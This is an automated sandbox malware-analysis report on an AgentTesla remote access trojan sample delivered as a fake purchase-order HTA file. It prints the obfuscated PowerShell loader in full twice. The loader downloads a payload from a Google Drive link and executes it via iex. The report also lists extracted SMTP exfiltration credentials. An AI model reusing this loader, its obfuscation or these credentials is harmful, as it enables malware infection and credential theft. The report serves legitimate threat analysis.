Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
-
submitted
16/05/2024, 02:43
General
-
Target
New Order n. 4533452041, date 14.05.2024.hta
-
Size
424KB
-
MD5
41bfa760446594a9ad5d9cb19b9f80ca
-
SHA1
02ee45b860e1488cb3570d460dbba1e6eae6a226
-
SHA256
041f367ef3d1d7391917341bb6da3089f2534751a6dc10a8de23cf5196ae6a2d
-
SHA512
edc7d012d7ba64dee5461e2bd95e072bbec38852ae8d3a449a707f74136d1c8693c359e8bfc6a53b54900897f646fb87a3d7ac2054ff672ed352f30fd1332c5e
-
SSDEEP
6144:7+4t1fXGwzkAitPzmeI9OQYypkHkSVdtxQ+5iYgbAL0WMhw19+z0yhtHn9eq/+41:7JJv0ayfOb64MRycngoavbN0vBrbRMn
Score
10/10
Malware Config
Extracted
Family
agenttesla
Credentials
Protocol: smtp- Host:
mail.bunturaja.co.id - Port:
587 - Username:
[email protected] - Password:
!@#$%,.Jakarta - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 17 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\New Order n. 4533452041, date 14.05.2024.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bygningsmssigt = 1;$Grundlags='Su';$Grundlags+='bstrin';$Grundlags+='g';Function Lamellaria110($Chronol){$Skibsskrue=$Chronol.Length-$Bygningsmssigt;For($Jellica65=1;$Jellica65 -lt $Skibsskrue;$Jellica65+=2){$Orientness+=$Chronol.$Grundlags.Invoke( $Jellica65, $Bygningsmssigt);}$Orientness;}function Ufuldbaarnes($Fireboy180){.($Intertrochanteric) ($Fireboy180);}$Tilbjeligste=Lamellaria110 '.M oIz i lMlDak/ 5 . 0O t(.WSi n d,oDw s. ,NBTM G1b0F..0 ;r .WSi,nB6 4 ;, xs6p4,;S Sr vD:M1T2A1D.T0P), eGRe cLk oG/ 2B0P1J0,0U1,0 1, FTi rPe fGo x /.1K2 1a.K0Z ';$Sgestiers=Lamellaria110 ' UFs.e r.-.AGg e n tS ';$Spillelrerindernes=Lamellaria110 'Ph.tDt,pAsP: /E/ dTr.i,v e .Lg,o o.g l e,. cLo mU/ u c ?ZeZxAp o rNt,= d.olwBnFl o aad & i.dT=A1IZTySN xPg TMDNKTE,X E,pMSRHBIFjTn 8So OtAAPAG wNQphR0CdLP WWs n ';$Inconsolableness=Lamellaria110 's> ';$Intertrochanteric=Lamellaria110 ',iIeCxO ';$peppily='Prgtigstes';Ufuldbaarnes (Lamellaria110 'RSPe tg-NCnoMn t eTnEt. M- P.ast.hP Tu: \WL n.p aKu sKe r s . t.x.tA A-CVHaTlSuCe, $.p e p pPi l,y,;v ');Ufuldbaarnes (Lamellaria110 ' i.f B(bt,e s tS- p.a t h ,T :J\,LGn p.aFuGsVeDr,sO.wt,xGtR)E{ e x,iOtV} ;, ');$Opnaaelig = Lamellaria110 'OeBc hRo A%.a,pRpSd aNt.a %.\OG e d,dTeDfFaIrCs e rBsS.pF o r &N&U NeFcghAoT $. ';Ufuldbaarnes (Lamellaria110 'F$Cg lfoKb.a.l :DF.rbaGmPeNs t.oLrBeB=M(,cKm d ,/ c, $eO.pFnsa aSeSl iSg ) ');Ufuldbaarnes (Lamellaria110 ' $Dg lBocbNaBl.:saGn kNeDtDi lKl aCd.e,l,sFe n = $ SDp irl l,ePlPr e r i nydTe r n e sV.,sBpOlBi t (B$EI nSc,o nGsHoAlPa,b,lLeMnAe sSs ). ');$Spillelrerindernes=$anketilladelsen[0];Ufuldbaarnes (Lamellaria110 'L$FgOlAo b.a l.: OHv e rgs t t eHrNtTe oRrBide rN= NSeEw -.O bHjKe c,t sS.yBs tDeKm,.MNDeSt,.CW ePbHCDl i,e nRt. ');Ufuldbaarnes (Lamellaria110 'L$SOBvVeArCsLtGt e r t.e,oDr,i ePrF. H eGa d.e.r.sB[ $,SDg.e sFt i,eRr,sT].=C$.T iPl.bEj.eMl iFgFs.tFeB ');$Pictographs=Lamellaria110 'POPvOeBr s t.tFeTratGeKo rOi.e r . D o.wNnVlEoTa d,FPi l eb(o$,SAp iSlAlPe l,rSe.r i nMd eFr nKeUsJ,R$,A fGsSetnBd.eSrAe nV)M ';$Pictographs=$Framestore[1]+$Pictographs;$Afsenderen=$Framestore[0];Ufuldbaarnes (Lamellaria110 '.$Ag lToAbCaSl :GB uUl l,rKo.a,r e r =F(ET e,s th- PMa,tBhL ,$ ABfMsFeFnFdLeAr.eFnF)C ');while (!$Bullroarer) {Ufuldbaarnes (Lamellaria110 'B$ g lToUb a l :SS,p.i nFdMe,r.iMeFtUsV=a$ tSr.uFe. ') ;Ufuldbaarnes $Pictographs;Ufuldbaarnes (Lamellaria110 'SS.tSaerhtW-RS,lCeBe pT 4C ');Ufuldbaarnes (Lamellaria110 ',$DgUlSo,b,a,lI: B uTlFl r oPaDrAe.rC=D( T eBs,t -,PSa.tPhS R$ A f sWetn d eAr.e n )S ') ;Ufuldbaarnes (Lamellaria110 'P$ g l oCb.a l,: F o r n a,m.mSeBsD=,$ gTlBo.b a.lO:KB aHnCkTe dPeF+ +,%H$Ca,n k eDtTiPl lAa dUe l.sGe nD. cPomuSnFt ') ;$Spillelrerindernes=$anketilladelsen[$Fornammes];}$Atlassene=362597;$Feathering=26398;Ufuldbaarnes (Lamellaria110 ' $ g,l o,bCa l :.E k s iMsBt.e.n sJmCiOn iRm.a e,nBeIsj M=S SG eDtF- C osn,tOeSn.tC c$ Apf,sReUn dCe r e nP ');Ufuldbaarnes (Lamellaria110 'K$ g l.o b a lP:Gg aBnLdIhUiBi.s mU .=A W[NS yRsotCe m,..CPotn vEeHr t ]O: : F,rMo mBB aDsVe 6m4TS.tHr,iTn gM(F$wE kEseiJsEt.e,nHs m i nPi,mRa,e nMe,sK)H ');Ufuldbaarnes (Lamellaria110 'L$,g lJopbMaBlt:Sb.n f aSl,dPeOs =, t[ES y s tteAmU..T eIx.t..IE nFcSoIdAi,n.g,]P: :BAHS C,IPI .,GSe tSSLtErUiBn gM(.$ gHaHn d,hTiRi sPmM) ');Ufuldbaarnes (Lamellaria110 'R$PgplIo,b aKlS: BPu.rNrOeEtQaCvOl e,=,$Fb.n.f.aFl,d.eSs .bs.uAbCsCt r.i njgA( $PA tHl ans sSe.nRe , $ FGeMa tBhAe r.iLn gR) ');Ufuldbaarnes $Burretavle;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Geddefarsers.For && echo $"3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bygningsmssigt = 1;$Grundlags='Su';$Grundlags+='bstrin';$Grundlags+='g';Function Lamellaria110($Chronol){$Skibsskrue=$Chronol.Length-$Bygningsmssigt;For($Jellica65=1;$Jellica65 -lt $Skibsskrue;$Jellica65+=2){$Orientness+=$Chronol.$Grundlags.Invoke( $Jellica65, $Bygningsmssigt);}$Orientness;}function Ufuldbaarnes($Fireboy180){.($Intertrochanteric) ($Fireboy180);}$Tilbjeligste=Lamellaria110 '.M oIz i lMlDak/ 5 . 0O t(.WSi n d,oDw s. ,NBTM G1b0F..0 ;r .WSi,nB6 4 ;, xs6p4,;S Sr vD:M1T2A1D.T0P), eGRe cLk oG/ 2B0P1J0,0U1,0 1, FTi rPe fGo x /.1K2 1a.K0Z ';$Sgestiers=Lamellaria110 ' UFs.e r.-.AGg e n tS ';$Spillelrerindernes=Lamellaria110 'Ph.tDt,pAsP: /E/ dTr.i,v e .Lg,o o.g l e,. cLo mU/ u c ?ZeZxAp o rNt,= d.olwBnFl o aad & i.dT=A1IZTySN xPg TMDNKTE,X E,pMSRHBIFjTn 8So OtAAPAG wNQphR0CdLP WWs n ';$Inconsolableness=Lamellaria110 's> ';$Intertrochanteric=Lamellaria110 ',iIeCxO ';$peppily='Prgtigstes';Ufuldbaarnes (Lamellaria110 'RSPe tg-NCnoMn t eTnEt. M- P.ast.hP Tu: \WL n.p aKu sKe r s . t.x.tA A-CVHaTlSuCe, $.p e p pPi l,y,;v ');Ufuldbaarnes (Lamellaria110 ' i.f B(bt,e s tS- p.a t h ,T :J\,LGn p.aFuGsVeDr,sO.wt,xGtR)E{ e x,iOtV} ;, ');$Opnaaelig = Lamellaria110 'OeBc hRo A%.a,pRpSd aNt.a %.\OG e d,dTeDfFaIrCs e rBsS.pF o r &N&U NeFcghAoT $. ';Ufuldbaarnes (Lamellaria110 'F$Cg lfoKb.a.l :DF.rbaGmPeNs t.oLrBeB=M(,cKm d ,/ c, $eO.pFnsa aSeSl iSg ) ');Ufuldbaarnes (Lamellaria110 ' $Dg lBocbNaBl.:saGn kNeDtDi lKl aCd.e,l,sFe n = $ SDp irl l,ePlPr e r i nydTe r n e sV.,sBpOlBi t (B$EI nSc,o nGsHoAlPa,b,lLeMnAe sSs ). ');$Spillelrerindernes=$anketilladelsen[0];Ufuldbaarnes (Lamellaria110 'L$FgOlAo b.a l.: OHv e rgs t t eHrNtTe oRrBide rN= NSeEw -.O bHjKe c,t sS.yBs tDeKm,.MNDeSt,.CW ePbHCDl i,e nRt. ');Ufuldbaarnes (Lamellaria110 'L$SOBvVeArCsLtGt e r t.e,oDr,i ePrF. H eGa d.e.r.sB[ $,SDg.e sFt i,eRr,sT].=C$.T iPl.bEj.eMl iFgFs.tFeB ');$Pictographs=Lamellaria110 'POPvOeBr s t.tFeTratGeKo rOi.e r . D o.wNnVlEoTa d,FPi l eb(o$,SAp iSlAlPe l,rSe.r i nMd eFr nKeUsJ,R$,A fGsSetnBd.eSrAe nV)M ';$Pictographs=$Framestore[1]+$Pictographs;$Afsenderen=$Framestore[0];Ufuldbaarnes (Lamellaria110 '.$Ag lToAbCaSl :GB uUl l,rKo.a,r e r =F(ET e,s th- PMa,tBhL ,$ ABfMsFeFnFdLeAr.eFnF)C ');while (!$Bullroarer) {Ufuldbaarnes (Lamellaria110 'B$ g lToUb a l :SS,p.i nFdMe,r.iMeFtUsV=a$ tSr.uFe. ') ;Ufuldbaarnes $Pictographs;Ufuldbaarnes (Lamellaria110 'SS.tSaerhtW-RS,lCeBe pT 4C ');Ufuldbaarnes (Lamellaria110 ',$DgUlSo,b,a,lI: B uTlFl r oPaDrAe.rC=D( T eBs,t -,PSa.tPhS R$ A f sWetn d eAr.e n )S ') ;Ufuldbaarnes (Lamellaria110 'P$ g l oCb.a l,: F o r n a,m.mSeBsD=,$ gTlBo.b a.lO:KB aHnCkTe dPeF+ +,%H$Ca,n k eDtTiPl lAa dUe l.sGe nD. cPomuSnFt ') ;$Spillelrerindernes=$anketilladelsen[$Fornammes];}$Atlassene=362597;$Feathering=26398;Ufuldbaarnes (Lamellaria110 ' $ g,l o,bCa l :.E k s iMsBt.e.n sJmCiOn iRm.a e,nBeIsj M=S SG eDtF- C osn,tOeSn.tC c$ Apf,sReUn dCe r e nP ');Ufuldbaarnes (Lamellaria110 'K$ g l.o b a lP:Gg aBnLdIhUiBi.s mU .=A W[NS yRsotCe m,..CPotn vEeHr t ]O: : F,rMo mBB aDsVe 6m4TS.tHr,iTn gM(F$wE kEseiJsEt.e,nHs m i nPi,mRa,e nMe,sK)H ');Ufuldbaarnes (Lamellaria110 'L$,g lJopbMaBlt:Sb.n f aSl,dPeOs =, t[ES y s tteAmU..T eIx.t..IE nFcSoIdAi,n.g,]P: :BAHS C,IPI .,GSe tSSLtErUiBn gM(.$ gHaHn d,hTiRi sPmM) ');Ufuldbaarnes (Lamellaria110 'R$PgplIo,b aKlS: BPu.rNrOeEtQaCvOl e,=,$Fb.n.f.aFl,d.eSs .bs.uAbCsCt r.i njgA( $PA tHl ans sSe.nRe , $ FGeMa tBhAe r.iLn gR) ');Ufuldbaarnes $Burretavle;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Geddefarsers.For && echo $"4⤵
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53KB
MD5d4d8cef58818612769a698c291ca3b37
SHA154e0a6e0c08723157829cea009ec4fe30bea5c50
SHA25698fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
506KB
MD56664c38cad5cd3c4f546f3e144c9166b
SHA1a7acbb9d0c21684a1c31e1f04c389855aa3e621a
SHA256d557ebf7522ed213fdb7f00da07cc817767a45b830cfdb517eaf751d5e97b2b2
SHA5129255299f22227d2f275e43a1bbd0444cbb37380085a9a1b82e85bf8df218089ac67b8ad0d6391e188948001ae306948f8739f66164d71b44096dbbb17e168ae0
-
Filesize
40KB
-
Filesize
584KB
-
Filesize
320KB
-
Filesize
18.3MB
-
Filesize
264KB
-
Filesize
600KB
-
Filesize
4KB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
6.5MB
-
Filesize
104KB
-
Filesize
4KB
-
Filesize
136KB
-
Filesize
5.6MB
-
Filesize
408KB
-
Filesize
216KB
-
Filesize
3.3MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
6.2MB
-
Filesize
7.7MB
-
Filesize
52.8MB